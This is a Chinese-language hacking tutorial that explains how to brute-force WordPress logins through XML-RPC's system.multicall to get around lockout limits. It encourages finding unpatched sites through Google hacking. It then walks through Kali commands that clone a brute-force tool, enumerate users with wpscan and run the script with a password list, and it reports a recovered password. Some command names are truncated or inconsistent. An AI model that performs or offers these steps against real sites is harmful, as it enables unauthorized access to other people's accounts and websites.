0x01 介绍

WordPress是世界上使用最广泛的网站内容管理系统（CMS），占互联网上所有网站的近28％。 这意味着数以千万计的网站使用这个CMS，我们在那里找到的漏洞可以在很多网站上使用，因此将大量的时间和精力投入到WordPress网站上是有意义的。

XML-RPC或XML远程过程调用使WordPress用户和开发人员能够远程访问他们的站点，从而实现远程过程调用。 通过这种方式，开发人员和作者可以通过智能手机和其他设备远程访问他们的网站。 智能手机和其他远程设备应用程序通过XML-RPC提供用户凭据来访问WordPress网站。

通常，当我们试图强制密码时，系统会为我们尝试的每个用户密码看到一次登录尝试。 一旦我们达到了一些尝试的极限，系统就会锁定我们。 然而，XMLRPC有一个system.multicall，我们可以通过一个HTTP请求发送数百或数千个密码。 黑客可以使用XMLRPC呈现数千个凭证，而不会出现锁定或其他安全设备干扰的风险。

XMLRPC在WordPress 2.6中发布，从3.5版开始，默认情况下它已经打开。 在较新版本的WordPress中，此漏洞已得到缓解，但我们都知道互联网上有数百万未发布的WordPress网站。 我们只需要耐心地通过Google黑客攻击和其他方法找到这些未打补丁的网站。

0x02 攻击

Step #1 安装WordPress XMLRPC 暴力破解工具

克隆github上面源码

kali > git clone http://github.com/1N3/WordPress-XMLRPC-Brute-Force-Explo

进入文件夹查看利用文件

kali > cd WordPress-XMLRPC-Brute-Force-Exploit

Step #2 使用wpscan获取用户

kali > wpscan -u <domain> --enumerate u

wordpress版本是4.6.1，接下来是用户名

Step #3 使用XMLRPC暴力破解

最后一步是使用XMLRPC工具来处理这些帐户。 由于此工具未使用标准登录界面，因此您可能会尝试使用数千个潜在密码。 当您找到正确的密码时，脚本将停止并向您显示正确的密码。

首先修改利用文件权限

kali > chmod 755 wordpress-xmlrpc-brute-v2.py

运行利用程序

kali > ./wordpress-xmlrpc-brute-v2.py

使用方法

kali > ./wordpress-b <URL> <password list> <username>

爆破taskfleet用户名密码

kali > ./wordpress http://wordpress_domain passwords.txt taskfleet

成功得到密码000000。

其实github上有很多的好工具，我们自己可以去慢慢发掘。